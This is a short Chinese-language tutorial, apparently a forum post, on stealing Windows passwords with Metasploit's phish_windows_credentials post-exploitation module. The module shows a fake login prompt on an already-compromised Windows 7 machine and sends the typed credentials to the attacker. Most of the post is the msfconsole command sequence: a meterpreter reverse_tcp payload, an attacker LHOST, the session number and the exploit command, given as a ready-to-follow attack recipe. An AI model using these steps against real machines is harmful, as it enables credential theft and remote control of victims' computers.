使用网络钓鱼登录提示漏洞攻击远程Windows密码

此模块能够通过弹出登录提示对目标执行网络钓鱼攻击。当用户在登录提示中填写凭据时,凭据将被发送给攻击者。该模块能够监视新进程并在特定进程启动时弹出登录提示。在Windows 7上测试过。


利用目标

Windows 7的


需求

攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
使用网络钓鱼登录提示漏洞攻击远程Windows密码
现在输入  post / windows / gather / phish_windows_credentials
msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp
msf exploit (phish_windows_credentials)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (phish_windows_credentials)>set session 1
msf exploit (phish_windows_credentials)>exploit
使用网络钓鱼登录提示漏洞攻击远程Windows密码
使用网络钓鱼登录提示漏洞攻击远程Windows密码
转载请注明本文链接: http://www.mayidui.net/t2409.html
话题: 网络钓鱼
游客
登录后才可以回帖,登录 或者 注册